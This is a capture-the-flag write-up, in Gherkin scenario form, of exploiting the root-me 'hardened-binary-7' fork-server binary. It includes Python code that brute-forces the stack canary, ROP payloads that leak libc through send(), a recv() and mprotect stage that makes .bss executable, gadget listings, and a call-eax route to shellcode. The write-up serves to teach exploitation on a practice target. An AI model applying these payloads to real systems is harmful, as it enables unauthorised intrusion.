## Version 2.0
## language: en

Feature: hardened-binary-7
  Site:
    root-me
  Category:
    app-systeme
  User:
    m'baku
  Goal:
    Get shell and read the password

  Background:
    Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 18.04.5   |
    | gdb-pwndbg      | 1.1.0     |
    | VMware          | 15.5.6    |
    | IDA             | 7.2       |
    | Ropper          | 1.10      |
    | Python          | 2.7       |
    | Windows         | 10        |

  Machine information:
    Given I am accessing the challenge through its URL
    When I visit the link
    Then I see the environment configuration
    """
    PIE: disabled
    Relro: enabled
    NX: enabled (heap and stack)
    ASLR: enabled
    SF: enabled
    SSP: enabled
    SRC: disabled
    """

  Scenario: Success: Analyzing the binary
    Given the source code is not provided
    Then I analyze the binary with IDA
    And I notice that the binary is a fork server [evidences](forkserver.png)
    Then I notice one bug that I am going to explain in detail
    And the bug is:
    """
    Stack buffer overflow
    """
    And to see how the bug is triggered
    Then I had to parse the "encrypt_buff" function [evidences](overflow.png)
    """
    ...
    0x08048DFF   mov     eax, large gs:14h
    0x08048E05   mov     [ebp+canary], eax
    0x08048E08   xor     eax, eax
    0x08048E0A   mov     eax, [ebp+ptrBuff]
    0x08048E10   movzx   eax, byte ptr [eax] ; Get the first byte of the buffer
    0x08048E13   mov     [ebp+byte], al
    0x08048E19   mov     eax, [ebp+ptrBuff]
    0x08048E1F   mov     [ebp+newPtrBuff], eax
    0x08048E25                           ; CODE XREF: des+120↑j
    0x08048E25                           ; des+122↑j
    0x08048E25   cmp     [ebp+bytes_recv], 0
    0x08048E29   jg      short loc_8048E35
    0x08048E2B   mov     eax, 0
    0x08048E30                           ; CODE XREF: des:loc_8048DB2↑j
    0x08048E30   jmp     loc_8048EED
    0x08048E35   --------------------------------------------------------------
    0x08048E35                           ; CODE XREF: des+12F↑j
    0x08048E35                           ; encrypt_buff+3D↑j ...
    0x08048E35   movzx   eax, [ebp+byte]
    0x08048E3C   mov     edx, [ebp+ptrBuff]
    0x08048E42   add     edx, 1
    0x08048E45   mov     [esp+8], eax    ; n (I can control the memcpy size)
    0x08048E49   mov     [esp+4], edx    ; src
    0x08048E4D   lea     eax, [ebp+dest]
    0x08048E53   mov     [esp], eax      ; dest
    0x08048E56   call    _memcpy
    ...
    """
    And due to the implementation of the function
    Then it is possible to control the amount of bytes to be copied with memcpy
    """
    ...
    0x08048E10   movzx   eax, byte ptr [eax] ; Get the first byte of the buffer
    0x08048E13   mov     [ebp+byte], al
    ...
    ...
    0x08048E35   movzx   eax, [ebp+byte]
    0x08048E3C   mov     edx, [ebp+ptrBuff]
    0x08048E42   add     edx, 1
    0x08048E45   mov     [esp+8], eax    ; n (I can control the memcpy size)
    0x08048E49   mov     [esp+4], edx    ; src
    0x08048E4D   lea     eax, [ebp+dest]
    0x08048E53   mov     [esp], eax      ; dest
    0x08048E56   call    _memcpy
    ...
    """
    And this can result in a Buffer Overflow
    When the size of memcpy is greater than the length of the dest

  Scenario: Success: Leaking the canary
    Given the binary is a fork server
    And it is vulnerable to Stack Buffer Overflow
    Then I can leak the canary byte by byte [evidences](bytebybyte.png)
    """
    canary = '\x00'

    for i in range(255):
        p = remote(sys.argv[1], int(sys.argv[2]))

        payload = ''
        payload += '\x82'
        payload += 'A' * 128
        payload += canary
        payload += chr(i)

        p.send(payload)
        p.recvline()
        try:
            if p.recvline():
            canary += chr(i)
            print "Byte found: ", chr(i)
            break
        except EOFError:
            continue
        finally:
            p.close()
    """
    And thanks to this I could control the return and flow of the program

  Scenario: Fail: Leak libc and perform ret2libc
    Given I have control of EIP, I mean, I control the execution of the program
    Then my idea is to redirect the binary to leak LIBC
    And perform a ret2libc
    Then to leak I use the send() function
    """
    payload = ''
    payload += '\xff'
    payload += '\x00' + 'A' * 127
    payload += p32(canary) # canary
    payload += 'A' * 12 # padding
    payload += p32(send_plt)
    payload += p32(0x080493c5) # pop ebx; pop esi; pop edi; pop ebp; ret
    payload += p32(0x4) # fd
    payload += p32(send_got) # send@got
    payload += p32(0x4) # len
    payload += p32(0x0) # flags
    payload += p32(0x41414141) # ret
    """
    Then it was possible to leak correctly but I couldn't ret2libc
    And this is because the binary is a server
    And it does not receive data by stdin

  Scenario: Success: Unprotect bss section
    Given I can't perform a ret2libc
    Then my idea is to try to execute code in a writable section
    And for that I first need to set that section as rwx
    Then I use the recv() function to write bytes to a writable address
    """
    payload += p32(recv_plt)
    payload += p32(0x080493c5) # pop ebx; pop esi; pop edi; pop ebp; ret
    payload += p32(0x4) # sockfd
    payload += p32(0x804b190) # .bss
    payload += p32(100) # len
    payload += p32(0x0) # flags
    payload += p32(0x08048913) # pop ebp ; ret
    payload += p32(0x804b190 - 4)
    payload += p32(0x8049416) # leave ; ret
    """
    And I created a false stack in that section to continue ROPing
    Then to unprotect that section I need to make a call to mprotect()
    """
    mprotect(void *addr, size_t len, int prot);
    """
    And in this way to be able to set bss as rwx [evidences](segmentrwx.png)
    """
    unprotect = ''
    unprotect += p32(mprotect)
    unprotect += p32(0x080493c6) # pop esi; pop edi; pop ebp; ret
    unprotect += p32(0x804b000) # addr
    unprotect += p32(0x1000) # len
    unprotect += p32(0x7) # prot
    """
    Then thanks to this I have control of an entire segment

  Scenario: Fail: Return to shellcode
    Given I can set the bss segment as rwx
    Then the idea is to put a shellcode there
    And redirect the binary to the shellcode
    Then this idea is good but having a false stack
    Then it is not possible to do it directly

  Scenario: Success: Call to shellcode
    Given the idea is to execute a shellcode
    And I can't return to this because I have a false stack
    Then my idea is to make a direct call for any register
    And for this I need to find gadgets that help me
    Then I used Ropper for this
    """
    $ ropper --file ch27
    0x0804893f: call eax;
    0x0804893f: call eax; leave; ret;
    0x08048bd7: cmp dword ptr [ebp - 0xc], 0; jg 0xbb9; leave; ret;
    0x080493ef: cmp eax, -1; jne 0x13e8; add esp, 4; pop ebx; pop ebp; ret;
    0x08048db1: dec ebp; jle 0xe33; jle 0xe35; jle 0xe37; jle 0xdbb; jmp eax;
    0x08048c7a: dec ebx; dec
    ...
    0x08048c83: pop eax; pop ebp; ret;
    0x080488b6: pop eax; pop ebx; leave; ret;
    0x08048913: pop ebp; ret;
    0x08048912: pop ebx; pop ebp; ret;
    0x080493c5: pop ebx; pop esi; pop edi; pop ebp; ret;
    0x080488b7: pop ebx; leave; ret;
    """
    And I selected two interesting gadgets
    """
    0x0804893f: call eax;
    0x08048c83: pop eax; pop ebp; ret;
    """
    Then with these gadgets the idea is to place the shellcode in eax
    And later make a call to eax [evidences](calleax.png)
    Then in this way I managed to exploit the binary locally

  Scenario: Success: Exploiting the binary remotely
    Given the exploit works locally [evidences](localexploit.png)
    Then to make it work remotely I need the correct offsets from its LIBC
    And to find out there is a page called "libc database search"
    """
    https://libc.blukat.me
    """ [evidences](libcdatabase.png)
    Then I just put the name of the leaked function and its last 2 bytes
    And calculate the absolute values of the functions
    """
    send_libc = u32(p.recv(4).ljust(4, '\x00'))
    libc = send_libc - 0x0fa560 # 0xf8a70
    mprotect = libc + 0x000f47a0 #0xf2cd0

    print "canary ", hex(canary)
    print "send() ", hex(send_libc)
    print "libc ", hex(libc)
    print "mprotect() ", hex(mprotect)
    """
    Then the process is the same as the local exploit
    And voila, so I managed to exploit it [evidences](remoteexploit.png)
